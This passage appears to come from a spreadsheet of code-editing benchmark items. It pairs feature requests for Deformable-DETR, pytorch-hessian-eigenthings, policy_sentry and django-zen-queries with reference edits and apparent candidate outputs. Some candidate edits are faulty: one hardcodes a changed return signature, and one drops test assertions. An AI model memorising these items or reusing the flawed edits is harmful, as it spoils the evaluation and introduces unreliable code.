RandomCrop(object):\n    def __init__(self, size):\n        self.size = size\n    def __call__(self, img, target):\n        region = T.RandomCrop.get_params(img, self.size)\n        return crop(img, target, region)\n\nclass RandomSizeCrop(object):\n    def __init__(self, min_size: int, max_size: int):\n        self.min_size = min_size\n        self.max_size = max_size\n    def __call__(self, img: PIL.Image.Image, target: dict):\n        w = random.randint(self.min_size, min(img.width, self.max_size))\n        h = random.randint(self.min_size, min(img.height, self.max_size))\n        region = T.RandomCrop.get_params(img, [h, w])\n        return crop(img, target, region)\n\nclass CenterCrop(object):\n    def __init__(self, size):\n        self.size = size\n    def __call__(self, img, target):\n        image_width, image_height = img.size\n        crop_height, crop_width = self.size\n        crop_top = int(round((image_height - crop_height) / 2.))\n        crop_left = int(round((image_width - crop_width) / 2.))\n        return crop(img, target, (crop_top, crop_left, crop_height, crop_width))', 'feature_description': 'Add a feature to allow the crop function to optionally return the original image size before cropping. This enables tracking of the original dimensions for downstream processing and evaluation purposes.', 'modified_complete_code': '# File 1: Deformable-DETR/datasets/transforms.py\n\n# Modify the crop function signature and implementation\ndef crop(image, target, region, return_orig_size=False):\n    #Modify: Added return_orig_size parameter\n    cropped_image = F.crop(image, *region)\n    \n    #New: Store original image size before cropping\n    orig_size = image.size if return_orig_size else None\n\n    target = target.copy()\n    i, j, h, w = region\n\n    target["size"] = torch.tensor([h, w])\n    \n    #New: Add original size to target if requested\n    if return_orig_size:\n        target["orig_size_before_crop"] = torch.tensor([orig_size[1], orig_size[0]])\n\n    fields = ["labels", "area", "iscrowd"]\n\n    if "boxes" in target:\n        boxes = target["boxes"]\n        max_size = torch.as_tensor([w, h], dtype=torch.float32)\n        cropped_boxes = boxes - torch.as_tensor([j, i, j, i])\n        cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)\n        cropped_boxes = cropped_boxes.clamp(min=0)\n        area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)\n        target["boxes"] = cropped_boxes.reshape(-1, 4)\n        target["area"] = area\n        fields.append("boxes")\n\n    if "masks" in target:\n        target[\'masks\'] = target[\'masks\'][:, i:i + h, j:j + w]\n        fields.append("masks")\n\n    if "boxes" in target or "masks" in target:\n        if "boxes" in target:\n            cropped_boxes = target[\'boxes\'].reshape(-1, 2, 2)\n            keep = torch.all(cropped_boxes[:, 1, :] &gt; cropped_boxes[:, 0, :], dim=1)\n        else:\n            keep = target[\'masks\'].flatten(1).any(1)\n\n        for field in fields:\n            target[field] = target[field][keep]\n\n    return cropped_image, target\n\n\n# Modify RandomCrop class\nclass RandomCrop(object):\n    def __init__(self, size, return_orig_size=False):\n        self.size = size\n        #New: Add return_orig_size parameter\n        self.return_orig_size = return_orig_size\n\n    def __call__(self, img, target):\n        region = T.RandomCrop.get_params(img, self.size)\n        #Modify: Pass return_orig_size to crop function\n        return crop(img, target, region, return_orig_size=self.return_orig_size)\n\n\n# Modify RandomSizeCrop class\nclass RandomSizeCrop(object):\n    def __init__(self, min_size: int, max_size: int, return_orig_size=False):\n        self.min_size = min_size\n        self.max_size = max_size\n        #New: Add return_orig_size parameter\n        self.return_orig_size = return_orig_size\n\n    def __call__(self, img: PIL.Image.Image, target: dict):\n        w = random.randint(self.min_size, min(img.width, self.max_size))\n        h = random.randint(self.min_size, min(img.height, self.max_size))\n        region = T.RandomCrop.get_params(img, [h, w])\n        #Modify: Pass return_orig_size to crop function\n        return crop(img, target, region, return_orig_size=self.return_orig_size)\n\n\n# Modify CenterCrop class\nclass CenterCrop(object):\n    def __init__(self, size, return_orig_size=False):\n        self.size = size\n        #New: Add return_orig_size parameter\n        self.return_orig_size = return_orig_size\n\n    def __call__(self, img, target):\n        image_width, image_height = img.size\n        crop_height, crop_width = self.size\n        crop_top = int(round((image_height - crop_height) / 2.))\n        crop_left = int(round((image_width - crop_width) / 2.))\n        #Modify: Pass return_orig_size to crop function\n        return crop(img, target, (crop_top, crop_left, crop_height, crop_width), return_orig_size=self.return_orig_size)'}</t>
  </si>
  <si>
    <t>{'file_1': 'def crop(image, target, region, return_orig_size=False):\n    cropped_image = F.crop(image, *region)\n\n    target = target.copy()\n    i, j, h, w = region\n\n    # should we do something wrt the original size?\n    target["size"] = torch.tensor([h, w])\n\n    fields = ["labels", "area", "iscrowd"]\n\n    if "boxes" in target:\n        boxes = target["boxes"]\n        max_size = torch.as_tensor([w, h], dtype=torch.float32)\n        cropped_boxes = boxes - torch.as_tensor([j, i, j, i])\n        cropped_boxes = torch.min(cropped_boxes.reshape(-1, 2, 2), max_size)\n        cropped_boxes = cropped_boxes.clamp(min=0)\n        area = (cropped_boxes[:, 1, :] - cropped_boxes[:, 0, :]).prod(dim=1)\n        target["boxes"] = cropped_boxes.reshape(-1, 4)\n        target["area"] = area\n        fields.append("boxes")\n\n    if "masks" in target:\n        # FIXME should we update the area here if there are no boxes?\n        target[\'masks\'] = target[\'masks\'][:, i:i + h, j:j + w]\n        fields.append("masks")\n\n    # remove elements for which the boxes or masks that have zero area\n    if "boxes" in target or "masks" in target:\n        # favor boxes selection when defining which elements to keep\n        # this is compatible with previous implementation\n        if "boxes" in target:\n            cropped_boxes = target[\'boxes\'].reshape(-1, 2, 2)\n            keep = torch.all(cropped_boxes[:, 1, :] &gt; cropped_boxes[:, 0, :], dim=1)\n        else:\n            keep = target[\'masks\'].flatten(1).any(1)\n\n        for field in fields:\n            target[field] = target[field][keep]\n\n    if return_orig_size:\n        return cropped_image, target, torch.tensor([image.size[1], image.size[0]])\n    else:\n        return cropped_image, target', 'file_2': 'class RandomCrop(object):\n    def __init__(self, size):\n        self.size = size\n\n    def __call__(self, img, target):\n        region = T.RandomCrop.get_params(img, self.size)\n        return crop(img, target, region, return_orig_size=True)', 'file_3': "def make_coco_transforms(image_set):\n\n    normalize = T.Compose([\n        T.ToTensor(),\n        T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n    ])\n\n    scales = [480, 512, 544, 576, 608, 640, 672, 704, 736, 768, 800]\n\n    if image_set == 'train':\n        return T.Compose([\n            T.RandomHorizontalFlip(),\n            T.RandomSelect(\n                T.RandomResize(scales, max_size=1333),\n                T.Compose([\n                    T.RandomResize([400, 500, 600]),\n                    T.RandomSizeCrop(384, 600),\n                    T.RandomResize(scales, max_size=1333),\n                ])\n            ),\n            normalize,\n        ])\n\n    if image_set == 'val':\n        return T.Compose([\n            T.RandomResize([800], max_size=1333),\n            normalize,\n        ])\n\n    raise ValueError(f'unknown {image_set}')", 'file_4': 'def build(image_set, args):\n    root = Path(args.coco_path)\n    assert root.exists(), f\'provided COCO path {root} does not exist\'\n    mode = \'instances\'\n    PATHS = {\n        "train": (root / "train2017", root / "annotations" / f\'{mode}_train2017.json\'),\n        "val": (root / "val2017", root / "annotations" / f\'{mode}_val2017.json\'),\n    }\n\n    img_folder, ann_file = PATHS[image_set]\n    dataset = CocoDetection(img_folder, ann_file, transforms=make_coco_transforms(image_set), return_masks=args.masks,\n                            cache_mode=args.cache_mode, local_rank=get_local_rank(), local_size=get_local_size())\n    return dataset'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'deflated_power_iteration function in power_iter.py that computes top k eigenvalues by repeatedly subtracting out dyads', 'invoking_code_segment': 'compute_hessian_eigenthings function in __init__.py that calls deflated_power_iteration with hvp_operator and parameters', 'feature_description': 'Add a new parameter `max_iterations` to the `deflated_power_iteration` function to limit the maximum number of power iteration steps across all eigenvalue computations. This parameter is passed through `compute_hessian_eigenthings` and used in test files to control iteration limits.', 'modified_complete_code': '# File 1: pytorch-hessian-eigenthings/hessian_eigenthings/power_iter.py\n\ndef deflated_power_iteration(\n    operator: Operator,\n    num_eigenthings: int = 10,\n    power_iter_steps: int = 20,\n    power_iter_err_threshold: float = 1e-4,\n    momentum: float = 0.0,\n    use_gpu: bool = True,\n    fp16: bool = False,\n    to_numpy: bool = True,\n    max_iterations: int = None,  # #New parameter to limit total iterations\n) -&gt; Tuple[np.ndarray, np.ndarray]:\n    """\n    Compute top k eigenvalues by repeatedly subtracting out dyads\n    operator: linear operator that gives us access to matrix vector product\n    num_eigenvals number of eigenvalues to compute\n    power_iter_steps: number of steps per run of power iteration\n    power_iter_err_threshold: early stopping threshold for power iteration\n    max_iterations: maximum total iterations across all eigenvalue computations  # #New\n    returns: np.ndarray of top eigenvalues, np.ndarray of top eigenvectors\n    """\n    eigenvals = []\n    eigenvecs = []\n    current_op = operator\n    prev_vec = None\n    total_iterations = 0  # #New counter for total iterations\n\n    def _deflate(x, val, vec):\n        return val * vec.dot(x) * vec\n\n    utils.log("beginning deflated power iteration")\n    for i in range(num_eigenthings):\n        # #Modify check if max_iterations exceeded\n        if max_iterations is not None and total_iterations &gt;= max_iterations:\n            utils.log("reached max_iterations limit, stopping deflation")\n            break\n        \n        utils.log("computing eigenvalue/vector %d of %d" % (i + 1, num_eigenthings))\n        eigenval, eigenvec = power_iteration(\n            current_op,\n            power_iter_steps,\n            power_iter_err_threshold,\n            momentum=momentum,\n            use_gpu=use_gpu,\n            fp16=fp16,\n            init_vec=prev_vec,\n        )\n        total_iterations += power_iter_steps  # #New increment counter\n        utils.log("eigenvalue %d: %.4f" % (i + 1, eigenval))\n\n        def _new_op_fn(x, op=current_op, val=eigenval, vec=eigenvec):\n            return utils.maybe_fp16(op.apply(x), fp16) - _deflate(x, val, vec)\n\n        current_op = LambdaOperator(_new_op_fn, operator.size)\n        prev_vec = eigenvec\n        eigenvals.append(eigenval)\n        eigenvec = eigenvec.cpu()\n        if to_numpy:\n            numpy_eigenvec = eigenvec.detach().clone().numpy()\n            eigenvecs.append(numpy_eigenvec)\n        else:\n            eigenvecs.append(eigenvec)\n\n    eigenvals = np.array(eigenvals)\n    eigenvecs = np.array(eigenvecs)\n\n    sorted_inds = np.argsort(eigenvals)\n    eigenvals = eigenvals[sorted_inds][::-1]\n    eigenvecs = eigenvecs[sorted_inds][::-1]\n    return eigenvals, eigenvecs\n\n# File 2: pytorch-hessian-eigenthings/hessian_eigenthings/__init__.py\n\ndef compute_hessian_eigenthings(\n    model,\n    dataloader,\n    loss,\n    num_eigenthings=10,\n    full_dataset=True,\n    mode="power_iter",\n    use_gpu=True,\n    fp16=False,\n    max_possible_gpu_samples=2 ** 16,\n    max_iterations=None,  # #New parameter for max iterations\n    **kwargs\n):\n    """\n    Computes the top `num_eigenthings` eigenvalues and eigenvecs\n    for the hessian of the given model by using subsampled power iteration\n    with deflation and the hessian-vector product\n\n    Parameters\n    ---------------\n\n    model : Module\n        pytorch model for this netowrk\n    dataloader : torch.data.DataLoader\n        dataloader with x,y pairs for which we compute the loss.\n    loss : torch.nn.modules.Loss | torch.nn.functional criterion\n        loss function to differentiate through\n    num_eigenthings : int\n        number of eigenvalues/eigenvecs to compute. computed in order of\n        decreasing eigenvalue magnitude.\n    full_dataset : boolean\n        if true, each power iteration call evaluates the gradient over the\n        whole dataset.\n        (if False, you might want to check if the eigenvalue estimate variance\n         depends on batch size)\n    mode : str [\'power_iter\', \'lanczos\']\n        which backend algorithm to use to compute the top eigenvalues.\n    use_gpu:\n        if true, attempt to use cuda for all lin alg computatoins\n    fp16: bool\n        if true, store and do math with eigenvectors, gradients, etc. in fp16.\n        (you should test if this is numerically stable for your application)\n    max_possible_gpu_samples:\n        the maximum number of samples that can fit on-memory. used\n        to accumulate gradients for large batches.\n        (note: if smaller than dataloader batch size, this can have odd\n         interactions with batch norm statistics)\n    max_iterations: int  # #New\n        maximum total iterations for power iteration across all eigenvalue computations\n    **kwargs:\n        contains additional parameters passed onto lanczos or power_iter.\n    """\n    hvp_operator = HVPOperator(\n        model,\n        dataloader,\n        loss,\n        use_gpu=use_gpu,\n        full_dataset=full_dataset,\n        max_possible_gpu_samples=max_possible_gpu_samples,\n    )\n    eigenvals, eigenvecs = None, None\n    if mode == "power_iter":\n        eigenvals, eigenvecs = deflated_power_iteration(\n            hvp_operator, num_eigenthings, use_gpu=use_gpu, fp16=fp16, max_iterations=max_iterations, **kwargs  # #Modify pass max_iterations\n        )\n    elif mode == "lanczos":\n        eigenvals, eigenvecs = lanczos(\n            hvp_operator, num_eigenthings, use_gpu=use_gpu, fp16=fp16, **kwargs\n        )\n    else:\n        raise ValueError("Unsupported mode %s (must be power_iter or lanczos)" % mode)\n    return eigenvals, eigenvecs\n\n# File 3: pytorch-hessian-eigenthings/tests/variance_tests.py\n# #Modify test_full_hessian function to accept and pass max_iterations\ndef test_full_hessian(model, criterion, x, y, ntrials=10, max_iterations=None):  # #Modify\n    loss = criterion(model(x), y)\n    loss_grad = torch.autograd.grad(loss, model.parameters(), create_graph=True)\n    real_hessian = get_full_hessian(loss_grad, model)\n\n    samples = [(x_i, y_i) for x_i, y_i in zip(x, y)]\n    dataloader = DataLoader(samples, batch_size=len(x))\n\n    eigenvals = []\n    eigenvecs = []\n    nparams = len(real_hessian)\n\n    for _ in range(ntrials):\n        est_eigenvals, est_eigenvecs = compute_hessian_eigenthings(\n            model,\n            dataloader,\n            criterion,\n            num_eigenthings=nparams,\n            power_iter_steps=100,\n            power_iter_err_threshold=1e-9,\n            momentum=0.0,\n            use_gpu=False,\n            max_iterations=max_iterations,  # #New pass max_iterations\n        )\n        est_inds = np.argsort(est_eigenvals)\n        est_eigenvals = np.array(est_eigenvals)[est_inds][::-1]\n        est_eigenvecs = np.array(est_eigenvecs)[est_inds][::-1]\n        eigenvals.append(est_eigenvals)\n        eigenvecs.append(est_eigenvecs)\n\n    eigenvals = np.array(eigenvals)\n    eigenvecs = np.array(eigenvecs)\n    real_eigenvals, real_eigenvecs = np.linalg.eig(real_hessian)\n    real_inds = np.argsort(real_eigenvals)\n    real_eigenvals = np.array(real_eigenvals)[real_inds][::-1]\n    real_eigenvecs = np.array(real_eigenvecs)[real_inds][::-1]\n\n    plt.suptitle("Hessian eigendecomposition errors: %d trials" % ntrials)\n    plt.subplot(1, 2, 1)\n    plt.title("Eigenvalues")\n    plt.plot(list(range(nparams)), real_eigenvals, label="True Eigenvals", linewidth=3, linestyle=\'--\')\n    plot_eigenval_estimates(eigenvals, label="Estimates")\n    plt.legend()\n    plt.subplot(1, 2, 2)\n    plt.title("Eigenvector cosine simliarity")\n    plot_eigenvec_errors(real_eigenvecs, eigenvecs, label="Estimates")\n    plt.legend()\n    plt.savefig("full.png")\n    plt.clf()\n    return real_hessian\n\n# #Modify test_stochastic_hessian function\ndef test_stochastic_hessian(model, criterion, real_hessian, x, y, bs=10, ntrials=10, max_iterations=None):  # #Modify\n    samples = [(x_i, y_i) for x_i, y_i in zip(x, y)]\n    dataloader = DataLoader(samples, batch_size=bs)\n    eigenvals = []\n    eigenvecs = []\n    nparams = len(real_hessian)\n\n    for _ in range(ntrials):\n        est_eigenvals, est_eigenvecs = compute_hessian_eigenthings(\n            model,\n            dataloader,\n            criterion,\n            num_eigenthings=nparams,\n            power_iter_steps=100,\n            power_iter_err_threshold=1e-9,\n            momentum=0,\n            use_gpu=False,\n            max_iterations=max_iterations,  # #New pass max_iterations\n        )\n        est_inds = np.argsort(est_eigenvals)\n        est_eigenvals = np.array(est_eigenvals)[est_inds][::-1]\n        est_eigenvecs = np.array(est_eigenvecs)[est_inds][::-1]\n        eigenvals.append(est_eigenvals)\n        eigenvecs.append(est_eigenvecs)\n\n    eigenvals = np.array(eigenvals)\n    eigenvecs = np.array(eigenvecs)\n    real_eigenvals, real_eigenvecs = np.linalg.eig(real_hessian)\n    real_inds = np.argsort(real_eigenvals)\n    real_eigenvals = np.array(real_eigenvals)[real_inds][::-1]\n    real_eigenvecs = np.array(real_eigenvecs)[real_inds][::-1]\n\n    plt.suptitle("Stochastic Hessian eigendecomposition errors: %d trials" % ntrials)\n    plt.subplot(1, 2, 1)\n    plt.title("Eigenvalues")\n    plt.plot(list(range(nparams)), real_eigenvals, label="True Eigenvals", linewidth=3, linestyle=\'--\')\n    plot_eigenval_estimates(eigenvals, label="Estimates")\n    plt.legend()\n    plt.subplot(1, 2, 2)\n    plt.title("Eigenvector cosine simliarity")\n    plot_eigenvec_errors(real_eigenvecs, eigenvecs, label="Estimates")\n    plt.legend()\n    plt.savefig("stochastic.png")\n    plt.clf()\n\n# #Modify test_fixed_mini function\ndef test_fixed_mini(model, criterion, real_hessian, x, y, bs=10, ntrials=10, max_iterations=None):  # #Modify\n    x = x[:bs]\n    y = y[:bs]\n    samples = [(x_i, y_i) for x_i, y_i in zip(x, y)]\n    dataloader = DataLoader(samples, batch_size=len(x))\n    eigenvals = []\n    eigenvecs = []\n    nparams = len(real_hessian)\n\n    for _ in range(ntrials):\n        est_eigenvals, est_eigenvecs = compute_hessian_eigenthings(\n            model,\n            dataloader,\n            criterion,\n            num_eigenthings=nparams,\n            mode="lanczos",\n            power_iter_steps=10,\n            power_iter_err_threshold=1e-5,\n            momentum=0,\n            use_gpu=False,\n            max_iterations=max_iterations,  # #New pass max_iterations\n        )\n        est_eigenvals = np.array(est_eigenvals)\n        est_eigenvecs = np.array([t.numpy() for t in est_eigenvecs])\n        est_inds = np.argsort(est_eigenvals)\n        est_eigenvals = np.array(est_eigenvals)[est_inds][::-1]\n        est_eigenvecs = np.array(est_eigenvecs)[est_inds][::-1]\n        eigenvals.append(est_eigenvals)\n        eigenvecs.append(est_eigenvecs)\n\n    eigenvals = np.array(eigenvals)\n    eigenvecs = np.array(eigenvecs)\n    real_eigenvals, real_eigenvecs = np.linalg.eig(real_hessian)\n    real_inds = np.argsort(real_eigenvals)\n    real_eigenvals = np.array(real_eigenvals)[real_inds][::-1]\n    real_eigenvecs = np.array(real_eigenvecs)[real_inds][::-1]\n\n    plt.suptitle("Fixed mini-batch Hessian eigendecomposition errors: %d trials" % ntrials)\n    plt.subplot(1, 2, 1)\n    plt.title("Eigenvalues")\n    plt.plot(list(range(nparams)), real_eigenvals, label="True Eigenvals")\n    plot_eigenval_estimates(eigenvals, label="Estimates")\n    plt.legend()\n    plt.subplot(1, 2, 2)\n    plt.title("Eigenvector cosine simliarity")\n    plot_eigenvec_errors(real_eigenvecs, eigenvecs, label="Estimates")\n    plt.legend()\n    plt.savefig("fixed.png")\n\n# File 4: pytorch-hessian-eigenthings/tests/principle_eigenvec_tests.py\n# #Modify test_principal_eigenvec function to accept and pass max_iterations\ndef test_principal_eigenvec(model, criterion, x, y, ntrials, fp16, max_iterations=None):  # #Modify\n    loss = criterion(model(x), y)\n    loss_grad = torch.autograd.grad(loss, model.parameters(), create_graph=True)\n    print("computing real hessian")\n    real_hessian = get_full_hessian(loss_grad, model)\n    real_hessian += 1e-4 * np.eye(len(real_hessian))\n\n    samples = [(x_i, y_i) for x_i, y_i in zip(x, y)]\n    dataloader = DataLoader(samples, batch_size=len(x))\n\n    print("computing numpy principal eigenvec of hessian")\n    num_params = len(real_hessian)\n    real_eigenvals, real_eigenvecs = scipy.linalg.eigh(\n        real_hessian, eigvals=(num_params - 1, num_params - 1)\n    )\n    real_eigenvec, real_eigenval = real_eigenvecs[0], real_eigenvals[0]\n\n    est_eigenvals, est_eigenvecs = compute_hessian_eigenthings(\n        model,\n        dataloader,\n        criterion,\n        num_eigenthings=1,\n        power_iter_steps=10,\n        power_iter_err_threshold=1e-5,\n        momentum=0,\n        use_gpu=False,\n        fp16=fp16,\n        max_iterations=max_iterations,  # #New pass max_iterations\n    )\n    est_eigenval, est_eigenvec = est_eigenvecs[0], est_eigenvals[0]\n\n    print(real_eigenvec, est_eigenvec)\n    dotted = np.dot(real_eigenvec, est_eigenvec)\n    if dotted == 0.0:\n        score = 1.0\n    else:\n        norm = scipy.linalg.norm(real_eigenvec) * scipy.linalg.norm(est_eigenvec)\n        score = abs(dotted / norm)\n    print(score)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def deflated_power_iteration(\n    operator: Operator,\n    num_eigenthings: int = 10,\n    power_iter_steps: int = 20,\n    power_iter_err_threshold: float = 1e-4,\n    momentum: float = 0.0,\n    use_gpu: bool = True,\n    fp16: bool = False,\n    to_numpy: bool = True,\n    max_iterations: int = 100,\n) -&gt; Tuple[np.ndarray, np.ndarray]:\n    #Modify: Added max_iterations parameter\n    ...\n', '#file 2': "def compute_hessian_eigenthings(\n    model,\n    dataloader,\n    loss,\n    num_eigenthings=10,\n    full_dataset=True,\n    mode='power_iter',\n    use_gpu=True,\n    fp16=False,\n    max_possible_gpu_samples=2 ** 16,\n    max_iterations=100,\n    **kwargs\n):\n    #Modify: Added max_iterations parameter\n    ...\n    if mode == 'power_iter':\n        eigenvals, eigenvecs = deflated_power_iteration(\n            hvp_operator, num_eigenthings, use_gpu=use_gpu, fp16=fp16, max_iterations=max_iterations, **kwargs\n        )\n    ...\n", '#file 3': 'def test_full_hessian(model, criterion, x, y, ntrials=10):\n    ...\n    est_eigenvals, est_eigenvecs = compute_hessian_eigenthings(\n        model,\n        dataloader,\n        criterion,\n        num_eigenthings=nparams,\n        power_iter_steps=100,\n        power_iter_err_threshold=1e-9,\n        momentum=0.0,\n        use_gpu=False,\n        max_iterations=100,\n    )\n    ...\n', '#file 4': 'def test_principal_eigenvec(model, criterion, x, y, ntrials, fp16):\n    ...\n    est_eigenvals, est_eigenvecs = compute_hessian_eigenthings(\n        model,\n        dataloader,\n        criterion,\n        num_eigenthings=1,\n        power_iter_steps=10,\n        power_iter_err_threshold=1e-5,\n        momentum=0,\n        use_gpu=False,\n        fp16=fp16,\n        max_iterations=100,\n    )\n    ...\n'}</t>
  </si>
  <si>
    <t>{'file_1': 'import fnmatch\nfrom policy_sentry.querying.actions import get_actions_for_service\n\n#Modify\ndef determine_actions_to_expand(action_list):\n    """provide expanded list of actions, like ecr:*"""\n    expanded_actions = []\n    for action in action_list:\n        service_prefix, action_name = action.split(\':\')\n        actions = get_actions_for_service(service_prefix)\n        for a in actions:\n            if fnmatch.fnmatch(a.lower(), action.lower()):\n                expanded_actions.append(a)\n    return expanded_actions', 'file_2': 'from policy_sentry.analysis.expand import determine_actions_to_expand, get_expanded_policy\nfrom policy_sentry.querying.actions import remove_actions_not_matching_access_level\nfrom policy_sentry.util.policy_files import get_actions_from_policy, get_actions_from_statement\n\n#Modify\ndef analyze_by_access_level(policy_json, access_level):\n    """\n    Determine if a policy has any actions with a given access level. This is particularly useful when determining who\n    has \'Permissions management\' level access\n\n    :param policy_json: a dictionary representing the AWS JSON policy\n    :param access_level: The normalized access level - either \'read\', \'list\', \'write\', \'tagging\', or \'permissions-management\'\n    :return:\n        List: A list of actions\n    """\n    expanded_policy = get_expanded_policy(policy_json)\n    requested_actions = get_actions_from_policy(expanded_policy)\n    actions_by_level = remove_actions_not_matching_access_level(requested_actions, access_level)\n    return actions_by_level\n\n#Modify\ndef analyze_statement_by_access_level(statement_json, access_level):\n    """\n    Determine if a statement has any actions with a given access level.\n\n    :param statement_json: a dictionary representing a statement from an AWS JSON policy\n    :param access_level: The access level - either \'Read\', \'List\', \'Write\', \'Tagging\', or \'Permissions management\'\n    :return:\n        List: A list of actions\n    """\n    requested_actions = get_actions_from_statement(statement_json)\n    expanded_actions = determine_actions_to_expand(requested_actions)\n    actions_by_level = remove_actions_not_matching_access_level(expanded_actions, access_level)\n    return actions_by_level', 'file_3': 'import unittest\nimport json\nfrom policy_sentry.analysis.analyze import analyze_by_access_level, analyze_statement_by_access_level\n\nclass AnalysisExpandWildcardActionsTestCase(unittest.TestCase):\n    def test_analyze_by_access_level(self):\n        """test_analyze_by_access_level: Test out calling this as a library"""\n        permissions_management_policy = {\n            "Version": "2012-10-17",\n            "Statement": [\n                {\n                    "Effect": "Allow",\n                    "Action": [\n                        # This one is Permissions management\n                        "ecr:SetRepositoryPolicy",\n                        "secretsmanager:DeleteResourcePolicy",\n                        # These ones are not permissions management\n                        "ecr:getrepositorypolicy",\n                        "ecr:describerepositories",\n                        "ecr:listimages",\n                        "ecr:DescribeImages",\n                    ],\n                    "Resource": "*"\n                },\n                {\n                    "Sid": "AllowManageOwnAccessKeys",\n                    "Effect": "Allow",\n                    "Action": [\n                        # These ones are permissions management\n                        "iam:CreateAccessKey",\n                        "iam:DeleteAccessKey",\n                        "iam:UpdateAccessKey",\n                        # This one is not\n                        "iam:ListAccessKeys",\n                    ],\n                    "Resource": "arn:aws:iam::*:user/${aws:username}"\n                },\n            ],\n        }\n        permissions_management_actions = analyze_by_access_level(\n            permissions_management_policy, "Permissions management"\n        )\n        # print(permissions_management_actions)\n        desired_actions_list = [\n            "ecr:SetRepositoryPolicy",\n            "iam:CreateAccessKey",\n            "iam:DeleteAccessKey",\n            "iam:UpdateAccessKey",\n            "secretsmanager:DeleteResourcePolicy",\n        ]\n        self.maxDiff = None\n        self.assertListEqual(permissions_management_actions, desired_actions_list)', 'file_4': ''}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class RenderMixin(object):\n    def render(self, *args, **kwargs):\n        with queries_disabled():\n            return super(RenderMixin, self).render(*args, **kwargs)', 'invoking_code_segment': 'def test_simple_template_response(self):\n        widgets = Widget.objects.all()\n        response = SimpleTemplateResponse("template.html", {"widgets": widgets})\n        with self.assertRaises(QueriesDisabledError):\n            response.render()\n\n    def test_template_response(self):\n        widgets = Widget.objects.all()\n        response = TemplateResponse(None, "template.html", {"widgets": widgets})\n        with self.assertRaises(QueriesDisabledError):\n            response.render()', 'feature_description': 'Add a new feature to allow rendering with queries enabled optionally. This feature enables users to optionally allow database queries during template rendering by passing a parameter to the TemplateResponse and SimpleTemplateResponse classes, providing flexibility for cases where queries are necessary during rendering.', 'modified_complete_code': '# File 1: django-zen-queries/zen_queries/template_response.py\nfrom django.template.response import (\n    SimpleTemplateResponse as DjangoSimpleTemplateResponse,\n)\nfrom django.template.response import TemplateResponse as DjangoTemplateResponse\nfrom zen_queries import queries_disabled, queries_dangerously_enabled\n\n\nclass RenderMixin(object):\n    # Modify: Add allow_queries parameter to __init__\n    def __init__(self, *args, allow_queries=False, **kwargs):\n        self.allow_queries = allow_queries\n        super(RenderMixin, self).__init__(*args, **kwargs)\n    \n    # Modify: Update render method to conditionally disable queries\n    def render(self, *args, **kwargs):\n        if self.allow_queries:\n            # New: Use queries_dangerously_enabled when allow_queries is True\n            with queries_dangerously_enabled():\n                return super(RenderMixin, self).render(*args, **kwargs)\n        else:\n            # Existing behavior: disable queries by default\n            with queries_disabled():\n                return super(RenderMixin, self).render(*args, **kwargs)\n\n\nclass TemplateResponse(RenderMixin, DjangoTemplateResponse):\n    pass\n\n\nclass SimpleTemplateResponse(RenderMixin, DjangoSimpleTemplateResponse):\n    pass\n\n\n# File 2: django-zen-queries/zen_queries/tests/tests.py (relevant test modifications)\nclass TemplateResponseTestCase(TestCase):\n    def test_simple_template_response(self):\n        widgets = Widget.objects.all()\n        response = SimpleTemplateResponse("template.html", {"widgets": widgets})\n        with self.assertRaises(QueriesDisabledError):\n            response.render()\n\n    def test_template_response(self):\n        widgets = Widget.objects.all()\n        response = TemplateResponse(None, "template.html", {"widgets": widgets})\n        with self.assertRaises(QueriesDisabledError):\n            response.render()\n    \n    # New: Test rendering with queries enabled\n    def test_simple_template_response_with_queries_enabled(self):\n        widgets = Widget.objects.all()\n        response = SimpleTemplateResponse("template.html", {"widgets": widgets}, allow_queries=True)\n        # Should not raise QueriesDisabledError\n        response.render()\n    \n    # New: Test rendering with queries enabled for TemplateResponse\n    def test_template_response_with_queries_enabled(self):\n        widgets = Widget.objects.all()\n        response = TemplateResponse(None, "template.html", {"widgets": widgets}, allow_queries=True)\n        # Should not raise QueriesDisabledError\n        response.render()'}</t>
  </si>
  <si>
    <t>{'file_1': "class RenderMixin(object):\n    def render(self, *args, **kwargs):\n        disable_queries = getattr(self, 'disable_queries', True)  # Modify\n        if disable_queries:\n            with queries_disabled():\n                return super(RenderMixin, self).render(*args, **kwargs)\n        else:\n            return super(RenderMixin, self).render(*args, **kwargs)", 'file_2': 'class TemplateResponse(RenderMixin, DjangoTemplateResponse):\n    pass\n\nclass SimpleTemplateResponse(RenderMixin, DjangoSimpleTemplateResponse):\n    pass\n\n# New\ndef create_template_response(request, template, context, disable_queries=True):\n    response = TemplateResponse(request, template, context)\n    response.disable_queries = disable_queries\n    return response', 'file_3': "from zen_queries.template_response import create_template_response  # New\n\nclass TemplateResponseTestCase(TestCase):\n    def test_simple_template_response(self):\n        widgets = Widget.objects.all()\n        response = create_template_response(None, 'template.html', {'widgets': widgets}, disable_queries=False)  # Modify\n        response.render()\n\n    def test_template_response(self):\n        widgets = Widget.objects.all()\n        response = create_template_response(None, 'template.html', {'widgets': widgets}, disable_queries=False)  # Modify\n        response.render()", 'file_4': "from zen_queries.template_response import create_template_response  # New\n\nclass TemplateTagTestCase(TestCase):\n    def test_queries_disabled_template_tag(self):\n        widgets = Widget.objects.all()\n        with self.assertRaises(QueriesDisabledError):\n            create_template_response(None, 'queries_disabled_tag.html', {'widgets': widgets}, disable_queries=True)  # Modify\n\n    def test_queries_dangerously_enabled_template_tag(self):\n        widgets = Widget.objects.all()\n        create_template_response(None, 'queries_dangerously_enabled_tag.html', {'widgets': widgets}, disable_queries=False)  # Modify"}</t>
  </si>
  <si>
